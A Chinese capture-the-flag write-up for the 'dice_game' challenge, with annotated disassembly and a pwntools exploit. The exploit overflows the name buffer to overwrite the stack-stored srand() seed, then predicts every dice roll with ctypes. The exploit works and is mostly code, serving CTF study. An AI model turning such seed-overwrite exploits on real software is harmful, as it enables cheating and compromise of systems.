
dice_game

分析过程

  1. 运行程序分析，可以发现两个输入点：① name；② point（输入 1~6 的数字，与程序生成的随机数进行比对）。
    2. 分析随机数是如何生成的，关键汇编代码如下（Intel 语法，从函数入口到 srand 调用为止）：

    ; dice_game: routine that reads the player's name and seeds rand().
    ; Intel syntax, SysV AMD64 ABI. Excerpt only: the listing stops right
    ; after srand(); the game loop that compares the player's point against
    ; rand() is not shown here.
    ; Security-relevant flow: seed = time(NULL) is parked on the stack, then
    ; read(0, buf, 0x50) runs BEFORE srand() consumes the seed, so bytes past
    ; the name buffer can land on the seed slot.
    push    rbp
    mov rbp, rsp
    sub rsp, 50h ; 0x50-byte frame holds buf, seed, var_18, var_19, var_4
    lea rdx, [rbp+buf]
    mov eax, 0 ; rax = 0 (32-bit write zero-extends), value stored by stosq
    mov ecx, 6 ; 6 qwords ...
    mov rdi, rdx
    rep stosq ; ... = only 48 bytes of buf are zero-initialised
    mov edi, 0 ; timer
    call time
    mov qword ptr [rbp+seed], rax # seed = time(NULL); kept on the stack until srand() below
    lea rdi, aWelcomeLetMeKn ; "Welcome, let me know your name: "
    mov eax, 0 ; al = 0: no vector args for the variadic printf (SysV)
    call printf
    mov rax, cs:stdout_ptr
    mov rax, [rax]
    mov rdi, rax ; stream
    call fflush
    lea rax, [rbp+buf]
    mov edx, 50h ; 'P' ; nbytes -- 0x50 = 80 bytes, 32 more than were zeroed above
    mov rsi, rax ; buf
    mov edi, 0 ; fd
    call read # read(0, buf, 0x50): user input overruns the name buffer and can overwrite seed (exact offset of seed is not visible in this listing; confirm in gdb)
    mov [rbp+var_18], rax ; var_18 = bytes read (signed: -1 on error, 0 on EOF)
    cmp [rbp+var_18], 31h
    jg short loc_C14 ; signed compare: a read of more than 0x31 (49) bytes skips the NUL-termination below and continues at loc_C14 (not shown)
    mov rax, [rbp+var_18]
    sub rax, 1
    mov [rbp+rax+buf], 0 ; buf[n-1] = 0 ; NOTE(review): no check for n <= 0 -- a read() of 0 or -1 writes the 0 below buf (buf[-1] / buf[-2])
    lea rax, [rbp+buf]
    mov rsi, rax
    lea rdi, aHiSLetSPlayAGa ; "Hi, %s. Let's play a game.\n"
    mov eax, 0 ; al = 0 for the variadic call
    call printf
    mov rax, cs:stdout_ptr
    mov rax, [rax]
    mov rdi, rax ; stream
    call fflush
    mov rax, qword ptr [rbp+seed] # reload the seed from the stack -- after read(), so an overflow has already replaced it
    mov edi, eax ; seed -- only the low 32 bits of the 8-byte stack slot reach srand()
    call srand # srand(seed): every rand() that follows is reproducible once the seed is known
    mov [rbp+var_4], 1 ; presumably the round counter -- rest of the routine not shown
    mov [rbp+var_19], 0 ; presumably a flag -- rest of the routine not shown
  3. 发现 seed 由 time() 得到后先存放在栈上，直到输入 name 之后才传给 srand；而 read(0, buf, 0x50) 最多读入 80 字节，name 缓冲区却只初始化了 48 字节（6 个 qword），多出的字节会覆盖栈上更高处的变量，其中就包括 seed（具体偏移需在 gdb 中确认）。因此在输入 name 时可以通过栈溢出覆盖 seed，使之后生成的随机数可预测。另外注意 `mov edi, eax`：srand 只使用 seed 的低 32 位，真正生效的种子是覆盖值的低 4 字节。
    4. 利用 ctypes 加载同一套 libc，以覆盖后的 seed 调用 srand/rand，提前算出程序会生成的随机数序列（exp 中的 rand()%6+1 需与程序后续计算 point 的方式一致，该部分未在上面的反汇编中列出）。
    5. exp 如下。name 载荷的长度远大于 0x31，因此程序不会走上面 `buf[n-1] = 0` 的截断分支，覆盖到 seed 上的字节保持完整：

from pwn import *
from ctypes import *
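# Same libc the target links against: replaying its srand()/rand() stream
# locally lets us predict every dice roll the game will produce.
libc = cdll.LoadLibrary("libc.so.6")
libc.srand.argtypes = [c_uint]
libc.srand.restype = None
libc.rand.argtypes = []
libc.rand.restype = c_int

# Name payload: every overflow byte that lands on the saved seed is 'k' (0x6b).
# It is longer than 0x31 bytes, so the target skips its buf[n-1] = 0
# truncation and the seed bytes stay intact.
NAME_PAYLOAD = b"kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk"
# Only the low 32 bits of the 8-byte stack slot reach srand() (the binary
# passes it with `mov edi, eax`), so the effective seed is 4 bytes of 0x6b.
# The original exploit passed 0x6b6b6b6b6b6b6b6b and relied on ctypes
# truncating it to a C int; spelling the 32-bit value out avoids that.
SEED = 0x6B6B6B6B
# Number of rounds answered; taken from the original exploit, the game loop
# itself is not in the listing above.
ROUNDS = 50


def predict_rolls(seed, count):
    """Return the `count` dice values the target produces after srand(seed).

    seed:  32-bit value handed to srand(), i.e. what the target's `mov edi, eax`
           leaves of the overwritten stack slot.
    count: number of rand() draws to replay.

    The roll formula rand() % 6 + 1 mirrors what the target is assumed to do
    (that part of the binary is not shown in the listing); adjust it if the
    point computation differs. glibc's rand() is non-negative, so Python's %
    matches C's here.
    """
    libc.srand(seed)
    return [libc.rand() % 6 + 1 for _ in range(count)]


def main():
    """Overwrite the seed through the name overflow, then answer every roll."""
    context.log_level = "debug"
    rolls = predict_rolls(SEED, ROUNDS)
    sh = process("dice_game")
    sh.recvuntil(b"name:")
    # gdb.attach(sh) here if the seed offset needs to be confirmed on the stack.
    sh.sendline(NAME_PAYLOAD)
    for roll in rolls:
        sh.recvuntil(b"point(1~6): ")
        sh.sendline(str(roll).encode())
    sh.interactive()


if __name__ == "__main__":
    main()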